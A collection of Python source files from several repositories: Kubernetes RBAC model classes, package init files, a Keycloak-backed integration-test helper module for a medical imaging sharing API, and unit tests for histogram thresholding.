"""
if isinstance(value, dict):
value = typing.cast(
RoleRef,
RoleRef().from_dict(value),
)
self._properties["roleRef"] = value
@property
def subjects(self) -> typing.List["Subject"]:
"""
Subjects holds references to the objects the role applies
to.
"""
return typing.cast(
typing.List["Subject"],
self._properties.get("subjects"),
)
@subjects.setter
def subjects(self, value: typing.Union[typing.List["Subject"], typing.List[dict]]):
"""
Subjects holds references to the objects the role applies
to.
"""
cleaned: typing.List[Subject] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
Subject,
Subject().from_dict(item),
)
cleaned.append(typing.cast(Subject, item))
self._properties["subjects"] = cleaned
def create_resource(self, namespace: "str" = None):
"""
Creates the RoleBinding in the currently
configured Kubernetes cluster.
"""
names = ["create_namespaced_role_binding", "create_role_binding"]
_kube_api.execute(
action="create",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict()},
)
def replace_resource(self, namespace: "str" = None):
"""
Replaces the RoleBinding in the currently
configured Kubernetes cluster.
"""
names = ["replace_namespaced_role_binding", "replace_role_binding"]
_kube_api.execute(
action="replace",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def patch_resource(self, namespace: "str" = None):
"""
Patches the RoleBinding in the currently
configured Kubernetes cluster.
"""
names = ["patch_namespaced_role_binding", "patch_role_binding"]
_kube_api.execute(
action="patch",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"body": self.to_dict(), "name": self.metadata.name},
)
def get_resource_status(self, namespace: "str" = None):
"""This resource does not have a status."""
pass
def read_resource(self, namespace: str = None):
"""
Reads the RoleBinding from the currently configured
Kubernetes cluster and returns the low-level definition object.
"""
names = [
"read_namespaced_role_binding",
"read_role_binding",
]
return _kube_api.execute(
action="read",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name},
)
def delete_resource(
self,
namespace: str = None,
propagation_policy: str = "Foreground",
grace_period_seconds: int = 10,
):
"""
Deletes the RoleBinding from the currently configured
Kubernetes cluster.
"""
names = [
"delete_namespaced_role_binding",
"delete_role_binding",
]
body = client.V1DeleteOptions(
propagation_policy=propagation_policy,
grace_period_seconds=grace_period_seconds,
)
_kube_api.execute(
action="delete",
resource=self,
names=names,
namespace=namespace,
api_client=None,
api_args={"name": self.metadata.name, "body": body},
)
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
            kwargs["api_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "RoleBinding":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
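# Example (illustrative sketch): binding a hypothetical "pod-reader" Role to
# a user via a RoleBinding. RoleRef and Subject are defined later in this
# module; the concrete names here are assumptions for demonstration only.
#
#   binding = RoleBinding(
#       metadata=ObjectMeta(name="read-pods", namespace="default"),
#       role_ref=RoleRef(
#           api_group="rbac.authorization.k8s.io",
#           kind="Role",
#           name="pod-reader",
#       ),
#       subjects=[Subject(kind="User", name="jane")],
#   )
#   binding.create_resource(namespace="default")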
class RoleBindingList(_kuber_definitions.Collection):
"""
    RoleBindingList is a collection of RoleBindings. Deprecated
in v1.17 in favor of rbac.authorization.k8s.io/v1
RoleBindingList, and will no longer be served in v1.20.
"""
def __init__(
self,
items: typing.List["RoleBinding"] = None,
metadata: "ListMeta" = None,
):
"""Create RoleBindingList instance."""
super(RoleBindingList, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="RoleBindingList"
)
self._properties = {
"items": items if items is not None else [],
"metadata": metadata if metadata is not None else ListMeta(),
}
self._types = {
"apiVersion": (str, None),
"items": (list, RoleBinding),
"kind": (str, None),
"metadata": (ListMeta, None),
}
@property
def items(self) -> typing.List["RoleBinding"]:
"""
Items is a list of RoleBindings
"""
return typing.cast(
typing.List["RoleBinding"],
self._properties.get("items"),
)
@items.setter
def items(self, value: typing.Union[typing.List["RoleBinding"], typing.List[dict]]):
"""
Items is a list of RoleBindings
"""
cleaned: typing.List[RoleBinding] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
RoleBinding,
RoleBinding().from_dict(item),
)
cleaned.append(typing.cast(RoleBinding, item))
self._properties["items"] = cleaned
@property
def metadata(self) -> "ListMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ListMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ListMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ListMeta,
ListMeta().from_dict(value),
)
self._properties["metadata"] = value
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
            kwargs["api_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "RoleBindingList":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class RoleList(_kuber_definitions.Collection):
"""
    RoleList is a collection of Roles. Deprecated in v1.17 in
favor of rbac.authorization.k8s.io/v1 RoleList, and will no
longer be served in v1.20.
"""
def __init__(
self,
items: typing.List["Role"] = None,
metadata: "ListMeta" = None,
):
"""Create RoleList instance."""
super(RoleList, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="RoleList"
)
self._properties = {
"items": items if items is not None else [],
"metadata": metadata if metadata is not None else ListMeta(),
}
self._types = {
"apiVersion": (str, None),
"items": (list, Role),
"kind": (str, None),
"metadata": (ListMeta, None),
}
@property
def items(self) -> typing.List["Role"]:
"""
Items is a list of Roles
"""
return typing.cast(
typing.List["Role"],
self._properties.get("items"),
)
@items.setter
def items(self, value: typing.Union[typing.List["Role"], typing.List[dict]]):
"""
Items is a list of Roles
"""
cleaned: typing.List[Role] = []
for item in value:
if isinstance(item, dict):
item = typing.cast(
Role,
Role().from_dict(item),
)
cleaned.append(typing.cast(Role, item))
self._properties["items"] = cleaned
@property
def metadata(self) -> "ListMeta":
"""
Standard object's metadata.
"""
return typing.cast(
"ListMeta",
self._properties.get("metadata"),
)
@metadata.setter
def metadata(self, value: typing.Union["ListMeta", dict]):
"""
Standard object's metadata.
"""
if isinstance(value, dict):
value = typing.cast(
ListMeta,
ListMeta().from_dict(value),
)
self._properties["metadata"] = value
@staticmethod
def get_resource_api(
api_client: client.ApiClient = None, **kwargs
) -> "client.RbacAuthorizationV1beta1Api":
"""
Returns an instance of the kubernetes API client associated with
this object.
"""
if api_client:
            kwargs["api_client"] = api_client
return client.RbacAuthorizationV1beta1Api(**kwargs)
def __enter__(self) -> "RoleList":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class RoleRef(_kuber_definitions.Definition):
"""
RoleRef contains information that points to the role being
used
"""
def __init__(
self,
api_group: str = None,
kind: str = None,
name: str = None,
):
"""Create RoleRef instance."""
super(RoleRef, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="RoleRef"
)
self._properties = {
"apiGroup": api_group if api_group is not None else "",
"kind": kind if kind is not None else "",
"name": name if name is not None else "",
}
self._types = {
"apiGroup": (str, None),
"kind": (str, None),
"name": (str, None),
}
@property
def api_group(self) -> str:
"""
APIGroup is the group for the resource being referenced
"""
return typing.cast(
str,
self._properties.get("apiGroup"),
)
@api_group.setter
def api_group(self, value: str):
"""
APIGroup is the group for the resource being referenced
"""
self._properties["apiGroup"] = value
@property
def kind(self) -> str:
"""
Kind is the type of resource being referenced
"""
return typing.cast(
str,
self._properties.get("kind"),
)
@kind.setter
def kind(self, value: str):
"""
Kind is the type of resource being referenced
"""
self._properties["kind"] = value
@property
def name(self) -> str:
"""
Name is the name of resource being referenced
"""
return typing.cast(
str,
self._properties.get("name"),
)
@name.setter
def name(self, value: str):
"""
Name is the name of resource being referenced
"""
self._properties["name"] = value
def __enter__(self) -> "RoleRef":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
class Subject(_kuber_definitions.Definition):
"""
Subject contains a reference to the object or user
identities a role binding applies to. This can either hold
a direct API object reference, or a value for non-objects
such as user and group names.
"""
def __init__(
self,
api_group: str = None,
kind: str = None,
name: str = None,
namespace: str = None,
):
"""Create Subject instance."""
super(Subject, self).__init__(
api_version="rbac.authorization.k8s.io/v1beta1", kind="Subject"
)
self._properties = {
"apiGroup": api_group if api_group is not None else "",
"kind": kind if kind is not None else "",
"name": name if name is not None else "",
"namespace": namespace if namespace is not None else "",
}
self._types = {
"apiGroup": (str, None),
"kind": (str, None),
"name": (str, None),
"namespace": (str, None),
}
@property
def api_group(self) -> str:
"""
APIGroup holds the API group of the referenced subject.
Defaults to "" for ServiceAccount subjects. Defaults to
"rbac.authorization.k8s.io" for User and Group subjects.
"""
return typing.cast(
str,
self._properties.get("apiGroup"),
)
@api_group.setter
def api_group(self, value: str):
"""
APIGroup holds the API group of the referenced subject.
Defaults to "" for ServiceAccount subjects. Defaults to
"rbac.authorization.k8s.io" for User and Group subjects.
"""
self._properties["apiGroup"] = value
@property
def kind(self) -> str:
"""
Kind of object being referenced. Values defined by this API
group are "User", "Group", and "ServiceAccount". If the
        Authorizer does not recognize the kind value, the
Authorizer should report an error.
"""
return typing.cast(
str,
self._properties.get("kind"),
)
@kind.setter
def kind(self, value: str):
"""
Kind of object being referenced. Values defined by this API
group are "User", "Group", and "ServiceAccount". If the
        Authorizer does not recognize the kind value, the
Authorizer should report an error.
"""
self._properties["kind"] = value
@property
def name(self) -> str:
"""
Name of the object being referenced.
"""
return typing.cast(
str,
self._properties.get("name"),
)
@name.setter
def name(self, value: str):
"""
Name of the object being referenced.
"""
self._properties["name"] = value
@property
def namespace(self) -> str:
"""
Namespace of the referenced object. If the object kind is
non-namespace, such as "User" or "Group", and this value is
not empty the Authorizer should report an error.
"""
return typing.cast(
str,
self._properties.get("namespace"),
)
@namespace.setter
def namespace(self, value: str):
"""
Namespace of the referenced object. If the object kind is
non-namespace, such as "User" or "Group", and this value is
not empty the Authorizer should report an error.
"""
self._properties["namespace"] = value
def __enter__(self) -> "Subject":
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
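The setters in the classes above all share one coercion idiom: accept either a typed object or a plain `dict`, and normalize the dict through `from_dict` before storing it. A self-contained sketch of that pattern (the `Meta` and `Collection` classes here are illustrative stand-ins, not the kuber implementation):

```python
import typing


class Meta:
    """Stand-in for a typed metadata object such as ListMeta (illustrative)."""

    def __init__(self) -> None:
        self.fields: dict = {}

    def from_dict(self, data: dict) -> "Meta":
        self.fields.update(data)
        return self


class Collection:
    """Demonstrates the dict-or-object setter coercion used above."""

    def __init__(self) -> None:
        self._properties: dict = {"metadata": Meta()}

    @property
    def metadata(self) -> "Meta":
        return typing.cast("Meta", self._properties.get("metadata"))

    @metadata.setter
    def metadata(self, value: typing.Union["Meta", dict]):
        if isinstance(value, dict):
            value = Meta().from_dict(value)
        self._properties["metadata"] = value


c = Collection()
c.metadata = {"name": "demo"}        # a plain dict is coerced...
assert isinstance(c.metadata, Meta)  # ...into the typed object
assert c.metadata.fields["name"] == "demo"
```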
bc5cc8911f3e6fa65b404e8b78ae32e73d8e3b60 | 1,549 | py | Python | practice/dezero/__init__.py | samrullo/deep-learning-from-scratch-3 | 47f17a9d25c8d40ac635fde7a0e3aa3937ce5ac0 | ["MIT"]
is_simple_core = False
if is_simple_core:
from practice.dezero.core_simple import Variable
from practice.dezero.core_simple import Function
from practice.dezero.core_simple import using_config
from practice.dezero.core_simple import no_grad
from practice.dezero.core_simple import as_array
from practice.dezero.core_simple import as_variable
from practice.dezero.core_simple import setup_variable
from practice.dezero.core_simple import add
from practice.dezero.core_simple import mul
from practice.dezero.core_simple import sub
from practice.dezero.core_simple import rsub
from practice.dezero.core_simple import div
from practice.dezero.core_simple import pow
else:
from practice.dezero.core import Variable
from practice.dezero.core import Parameter
from practice.dezero.core import Function
from practice.dezero.core import using_config
from practice.dezero.core import no_grad
from practice.dezero.core import as_array
from practice.dezero.core import as_variable
from practice.dezero.core import setup_variable
from practice.dezero.core import add
from practice.dezero.core import mul
from practice.dezero.core import sub
from practice.dezero.core import rsub
from practice.dezero.core import div
from practice.dezero.core import pow
from practice.dezero.layers import Model
from practice.dezero.layers import Layer
import practice.dezero.functions
import practice.dezero.utils
setup_variable()
version = "__1.0__"
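The `is_simple_core` flag above selects which backend module supplies the package's public names, re-exporting the same flat namespace from either `core_simple` or the full `core`. A self-contained sketch of the same switch, with stub modules standing in for the two dezero backends:

```python
import types

# Stub backends standing in for dezero's core_simple and core modules
core_simple = types.ModuleType("core_simple")
core_simple.add = lambda a, b: a + b

core = types.ModuleType("core")
core.add = lambda a, b: a + b
core.Parameter = type("Parameter", (), {})  # only the full core has Parameter

is_simple_core = False

# Mirror the __init__.py switch: one flat public namespace, two backends
backend = core_simple if is_simple_core else core
add = backend.add

assert add(2, 3) == 5
assert hasattr(core, "Parameter") and not hasattr(core_simple, "Parameter")
```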
bc78b7ea935e1ce840e3f4ab4728a6ddbfb34831 | 44 | py | Python | src/OracleDBLibrary/mapper/__init__.py | adeliogullari/robotframework-oracledb-library | 15392c9218b6a78059b8186ca24b557226383296 | ["ECL-2.0", "Apache-2.0"]
from .argument_mapper import ArgumentMapper
bcde334e877e220f7e961b5f571da55540d1d932 | 201 | py | Python | d2ix/postprocess/__init__.py | tum-ewk/d2ix_public | dffcb474f51ccdc03a339e306b61b88c224a332d | ["Apache-2.0"]
from d2ix.postprocess.plot import create_barplot
from d2ix.postprocess.timeseries import create_timeseries_df
from d2ix.postprocess.utils import create_plotdata_df, extract_synonyms_colors, group_data
bcf18922458e6d19a95558c47f23f0f6059d9ae2 | 24 | py | Python | Page/__init__.py | howiemac/image | be5f9c577cfd6502f0c63b42e226f5b101b1966c | ["BSD-3-Clause"]
from .Page import Page
4c238c594bcc09be0e8cfbe4f7e76aeb9d004524 | 1,864 | py | Python | wagtailmenus/__init__.py | nickyspag/wagtailmenus | e6942e021234c367c40f77a026700751c43ae2c9 | ["MIT"]
from wagtailmenus.utils.version import get_version, get_stable_branch_name
# major.minor.patch.release.number
# release must be one of alpha, beta, rc, or final
VERSION = (3, 0, 2, "final", 0)
__version__ = get_version(VERSION)
stable_branch_name = get_stable_branch_name(VERSION)
default_app_config = "wagtailmenus.apps.WagtailMenusConfig"
def get_main_menu_model_string():
"""
Get the dotted ``app.Model`` name for the main menu model as a string.
Useful for developers extending wagtailmenus, that need to refer to the
main menu model (such as in foreign keys), but the model itself is not
required.
"""
from wagtailmenus.conf import settings
return settings.MAIN_MENU_MODEL
def get_flat_menu_model_string():
"""
Get the dotted ``app.Model`` name for the flat menu model as a string.
Useful for developers extending wagtailmenus, that need to refer to the
flat menu model (such as in foreign keys), but the model itself is not
required.
"""
from wagtailmenus.conf import settings
return settings.FLAT_MENU_MODEL
def get_main_menu_model():
"""
Get the model from the ``WAGTAILMENUS_MAIN_MENU_MODEL`` setting.
Useful for developers extending wagtailmenus, and need the actual model.
Defaults to the standard :class:`~wagtailmenus.models.MainMenu` model
if no custom model is defined.
"""
from wagtailmenus.conf import settings
return settings.models.MAIN_MENU_MODEL
def get_flat_menu_model():
"""
Get the model from the ``WAGTAILMENUS_FLAT_MENU_MODEL`` setting.
    Useful for developers extending wagtailmenus, and need the actual model.
Defaults to the standard :class:`~wagtailmenus.models.FlatMenu` model
if no custom model is defined.
"""
from wagtailmenus.conf import settings
return settings.models.FLAT_MENU_MODEL
4c3f84640426c9117240b704ddf84e5119b74ec0 | 12,044 | py | Python | util.py | OsiriX-Foundation/IntegrationTest | a6c76f8a6f242aa0668b3417999dbae3d986e136 | ["MIT"]
import os
import requests
from requests.auth import AuthBase
import json
import urllib
from threading import Thread
import time
import pytest
import env
def print_request(methode, response, url):
print("\t" + methode + " " + url + " ["+ str(response.status_code) + " " + requests.status_codes._codes[response.status_code][0].upper() + ", " + str(int(response.elapsed.total_seconds()*1000))+"ms]")
print_info(response.content)
def urlencode(data):
return urllib.parse.urlencode(data)
def print_info(info):
if env.env_var.get("PRINT_INFO"):
print(info)
def print_json(json_object):
print(json.dumps(json_object, indent=4, sort_keys=True))
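The helpers above are thin wrappers over the standard library: `urlencode` percent-encodes form data for `application/x-www-form-urlencoded` bodies, and `print_json` pretty-prints with four-space indentation and sorted keys. Their behavior in isolation:

```python
import json
import urllib.parse

# Form encoding as used by the token and registration requests below
data = {"grant_type": "password", "client_id": "admin-cli"}
encoded = urllib.parse.urlencode(data)
assert encoded == "grant_type=password&client_id=admin-cli"

# Pretty-printing with sorted keys, as print_json does
pretty = json.dumps({"b": 1, "a": 2}, indent=4, sort_keys=True)
assert pretty.splitlines()[1].strip() == '"a": 2,'
```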
def add_user_keycloak(admin_username, admin_password, user_name, user_firstname, user_mail, user_username, user_password):
well_known_url = env.env_var.get("KEYCLOAK_URL") + "/auth/realms/master" + "/.well-known/openid-configuration"
response = requests.get(well_known_url)
assert response.status_code == 200
well_known = json.loads(response.content)
assert "token_endpoint" in well_known
token_endpoint = well_known["token_endpoint"]
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"grant_type": "password", "username": admin_username, "password": admin_password, "client_id":"admin-cli"}
response = requests.post(token_endpoint, headers=headers, data=data)
token_response = json.loads(response.content)
admin_token = token_response["access_token"]
create_user_url = env.env_var.get("KEYCLOAK_URL") +"/auth/admin/realms/"+ env.env_var.get("KEYCLOAK_REALM") + "/users"
headers = {"Content-Type": "application/json;charset=UTF-8", "Authorization": "Bearer " + admin_token}
data = {"enabled":True, "attributes":{}, "username":user_username, "emailVerified":True,"email":user_mail, "firstName":user_firstname, "lastName":user_name}
data = json.dumps(data)
response = requests.post(create_user_url, headers=headers, data=data)
    assert response.status_code in (201, 409)
if "Location" in response.headers.keys():
reset_password_url = response.headers["Location"] + "/reset-password"
headers = {"Content-Type": "application/json;charset=UTF-8", "Authorization": "Bearer " + admin_token}
data = {"type":"password", "value":user_password, "temporary":False}
data = json.dumps(data)
response = requests.put(reset_password_url, headers=headers, data=data)
assert response.status_code == 204
else:
print("user already exist")
print(response.content)
def get_token(username, password, client_id="loginConnect"):
well_known_url = env.env_var.get("KEYCLOAK_URL") + "/auth/realms/" + env.env_var.get("KEYCLOAK_REALM") + "/.well-known/openid-configuration"
response = requests.get(well_known_url)
assert response.status_code == 200
well_known = json.loads(response.content)
assert "token_endpoint" in well_known
token_endpoint = well_known["token_endpoint"]
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"grant_type": "password", "username": username, "password": password, "client_id":client_id}
response = requests.post(token_endpoint, headers=headers, data=data)
token_response = json.loads(response.content)
return token_response["access_token"]
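`get_token` performs the OAuth2 resource-owner password grant against the realm's discovered `token_endpoint`. The form body it sends can be built and inspected offline; the realm URL and credentials below are placeholders, not values from this test suite:

```python
import urllib.parse

realm_base = "https://keycloak.example.com/auth/realms/demo"  # placeholder
well_known_url = realm_base + "/.well-known/openid-configuration"

data = {
    "grant_type": "password",
    "username": "alice",       # placeholder credentials
    "password": "secret",
    "client_id": "loginConnect",
}
body = urllib.parse.urlencode(data)

assert "grant_type=password" in body
assert body.count("&") == 3  # four form fields joined by three ampersands
assert well_known_url.endswith("/.well-known/openid-configuration")
```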
def register(token):
request_url = env.env_var.get("URL") + "/register"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"access_token": token}
response = requests.post(request_url, headers=headers, data=data)
token_response = json.loads(response.content)
return token_response
################################################################
# REPORT PROVIDER
################################################################
def new_report_provider(token, data, album_id, status_code=201):
print()
request_url = env.env_var.get("URL") + "/albums/"+str(album_id)+"/reportproviders"
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(request_url, headers=headers, data=urlencode(data))
print_request("POST", response, request_url)
assert response.status_code == status_code
if status_code == 201:
reportprovider = json.loads(response.content)
return reportprovider
def test_report_provider_uri(token, url):
print()
request_url = env.env_var.get("URL") + "/reportproviders/metadata"
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
data = {"url": url}
response = requests.post(request_url, headers=headers, data=urlencode(data))
print_request("POST", response, request_url)
assert response.status_code == 200
metadata = json.loads(response.content)
return metadata
def get_report_provider(token, client_id, album_id, status_code=200):
print()
request_url = env.env_var.get("URL") + "/albums/" + str(album_id) + "/reportproviders/" + str(client_id)
headers = {"Authorization": "Bearer "+ token}
response = requests.get(request_url, headers=headers)
print_request("GET", response, request_url)
assert response.status_code == status_code
if status_code == 200:
reportprovider = json.loads(response.content)
return reportprovider
def report_provider_list(token, album_id, params=None, count=1):
print()
request_url = env.env_var.get("URL") + "/albums/"+str(album_id)+"/reportproviders"
headers = {"Authorization": "Bearer "+ token}
response = requests.get(request_url, headers=headers, params=params)
print_request("GET", response, request_url)
assert response.status_code == 200
assert response.headers.get("X-Total-Count") == str(count)
report_providers = json.loads(response.content)
return report_providers
def edit_report_provider(token, client_id, album_id, data, status_code=200):
print()
request_url = env.env_var.get("URL") + "/albums/" + str(album_id) + "/reportproviders/" + str(client_id)
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
response = requests.patch(request_url, headers=headers, data=urlencode(data))
print_request("PATCH", response, request_url)
assert response.status_code == status_code
if status_code == 200:
reportprovider = json.loads(response.content)
return reportprovider
def delete_report_provider(token, client_id, album_id, status_code=204):
print()
request_url = env.env_var.get("URL") + "/albums/" + str(album_id) + "/reportproviders/" + str(client_id)
headers = {"Authorization": "Bearer "+ token}
response = requests.delete(request_url, headers=headers)
print_request("DELETE", response, request_url)
assert response.status_code == status_code
################################################################
# SERIES & STUDIES
################################################################
def share_series_in_album(token, studies_UID, series_UID, album_id, X_Authorization_Source = "", status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID+"/albums/"+album_id
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
if X_Authorization_Source != "":
headers["X-Authorization-Source"] = "Bearer " + X_Authorization_Source
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def share_study_in_album(token, studies_UID, album_id, X_Authorization_Source = "", status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/albums/"+album_id
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
if X_Authorization_Source != "":
headers["X-Authorization-Source"] = "Bearer " + X_Authorization_Source
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def share_study_in_album_from_album(token, studies_UID, album_src_id, album_dst_id, status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/" + studies_UID + "/albums/" + album_dst_id
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
params = {"album": album_src_id}
response = requests.put(request_url, headers=headers, params=params)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def share_series_with_user(token, user, studies_UID, series_UID, status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID+"/users/"+user
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def share_study_with_user(token, user, studies_UID, status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/users/"+user
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def delete_series_from_inbox(token, studies_UID, series_UID, status_code=204):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID
headers = {"Authorization": "Bearer "+ token}
response = requests.delete(request_url, headers=headers)
print_request("DELETE", response, request_url)
assert response.status_code == status_code
def delete_study_from_inbox(token, studies_UID, status_code=204):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID
headers = {"Authorization": "Bearer "+ token}
response = requests.delete(request_url, headers=headers)
print_request("DELETE", response, request_url)
assert response.status_code == status_code
def delete_series_from_album(token, studies_UID, series_UID, album_id, status_code=204):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID+"/albums/"+album_id
headers = {"Authorization": "Bearer "+ token}
response = requests.delete(request_url, headers=headers)
print_request("DELETE", response, request_url)
assert response.status_code == status_code
def appropriate_study(token, studies_UID, X_Authorization_Source = "", status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID
headers = {"Authorization": "Bearer "+ token}
if X_Authorization_Source != "":
headers["X-Authorization-Source"] = "Bearer " + X_Authorization_Source
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def appropriate_series(token, studies_UID, series_UID, X_Authorization_Source = "", status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID
headers = {"Authorization": "Bearer "+ token}
if X_Authorization_Source != "":
headers["X-Authorization-Source"] = "Bearer " + X_Authorization_Source
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
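Several endpoints above attach an optional `X-Authorization-Source` bearer token alongside the primary `Authorization` header. The conditional header construction, in isolation (the helper name is illustrative):

```python
def build_headers(token: str, x_auth_source: str = "") -> dict:
    """Mirrors the conditional header construction used above."""
    headers = {"Authorization": "Bearer " + token}
    if x_auth_source != "":
        headers["X-Authorization-Source"] = "Bearer " + x_auth_source
    return headers


# Without a source token, only the primary header is sent
assert "X-Authorization-Source" not in build_headers("abc")
# With one, both headers carry the Bearer scheme
assert build_headers("abc", "xyz")["X-Authorization-Source"] == "Bearer xyz"
```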
4c69f5da9ca2d14f9581bb29d3fa738b285b97e5 | 8,349 | py | Python | tests/unittests/test_threshold_results.py | Siegallab/PIE | 54b4dfd3fe340b1bc69187dacf8c6b583714d65b | ["MIT"]
#!/usr/bin/python
'''
Tests that thresholds for input histograms produce correct results
'''
import unittest
import os
import numpy as np
from PIE import adaptive_threshold
from numpy.testing import assert_allclose
#from plotnine import *
#import pandas as pd
# Old SFig2A: 'xy01_08ms_3702': 11752
# Old SFig2B: 't10xy0320': 2662.2
# Old SFig2C: 'xy01_14ms_3702': 14240
# Old SFig2D: 't02xy0225': 10338
# Old SFig2E: 't09xy1107': 6816
class Test_mu1PosThresholdMethodTwoGauss(unittest.TestCase):
'''
Tests images that were run through _mu1PosThresholdMethodTwoGauss-equivalent
method in matlab, and compares thresholds arrived at there with the
ones identified by PIE.adaptive_threshold
'''
@classmethod
def setUpClass(self):
# set relative fold tolerance for comparison of expected and
# actual thresholds
self.rel_tolerance = 0.2
def _get_threshold(self, im_name):
'''
Opens histogram file (calculated in matlab) corresponding to
im_name, reads in smoothed log histogram, calculates and returns
threshold via PIE.adaptive_threshold._mu1PosThresholdMethodTwoGauss
'''
im_path = os.path.join('tests', 'test_ims',
(im_name + '_best_hist.csv'))
hist_data = np.loadtxt(im_path, delimiter=',')
x_pos = hist_data[0]
ln_hist_smooth = hist_data[2]
threshold_method = \
adaptive_threshold._mu1PosThresholdMethodTwoGauss(x_pos, ln_hist_smooth)
threshold = threshold_method.get_threshold()
        # p = threshold_method.plot()
# print(p)
# print(threshold)
return(threshold)
def test_xy01_08ms_3702(self):
test_threshold = self._get_threshold('xy01_08ms_3702')
expected_threshold = 11752
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t10xy0320(self):
test_threshold = self._get_threshold('t10xy0320')
expected_threshold = 2662.2
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_xy01_14ms_3702(self):
test_threshold = self._get_threshold('xy01_14ms_3702')
expected_threshold = 14240
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
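Each test in this class accepts a threshold within a relative tolerance of the MATLAB reference value via `assert_allclose(..., rtol=...)`. A stdlib approximation of that check (`math.isclose` is symmetric in its two arguments, while `assert_allclose` scales the tolerance by its second argument, but at these magnitudes the difference is negligible):

```python
import math


def within_rel_tol(expected: float, actual: float, rtol: float) -> bool:
    """Relative-tolerance check akin to assert_allclose(..., rtol=rtol)."""
    return math.isclose(expected, actual, rel_tol=rtol, abs_tol=0.0)


# A value 10% off the MATLAB threshold passes at rtol=0.2 but not at 0.05
assert within_rel_tol(11752, 11752 * 1.1, 0.2)
assert not within_rel_tol(11752, 11752 * 1.1, 0.05)
```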
class Test_mu1ReleasedThresholdMethod(unittest.TestCase):
'''
Tests images that were run through _mu1ReleasedThresholdMethod-
equivalent method in matlab, and compares thresholds arrived at
there with the ones identified by PIE.adaptive_threshold
'''
@classmethod
def setUpClass(self):
# set relative fold tolerance for comparison of expected and
# actual thresholds
self.rel_tolerance = 0.2
def _get_threshold(self, im_name):
'''
Opens histogram file (calculated in matlab) corresponding to
im_name, reads in smoothed log histogram, calculates and returns
threshold via PIE.adaptive_threshold._mu1ReleasedThresholdMethod
'''
im_path = os.path.join('tests', 'test_ims',
(im_name + '_best_hist.csv'))
hist_data = np.loadtxt(im_path, delimiter=',')
x_pos = hist_data[0]
ln_hist_smooth = hist_data[2]
threshold_method = \
adaptive_threshold._mu1ReleasedThresholdMethod(x_pos,
ln_hist_smooth)
threshold = threshold_method.get_threshold()
return(threshold)
def test_t02xy0225(self):
test_threshold = self._get_threshold('t02xy0225')
expected_threshold = 10338
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t10xy0320(self):
'''
This histogram would be sent to sliding circle method
'''
test_threshold = self._get_threshold('t10xy0320')
expected_threshold = np.nan
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)

class Test_DataSlidingCircleThresholdMethod(unittest.TestCase):
    '''
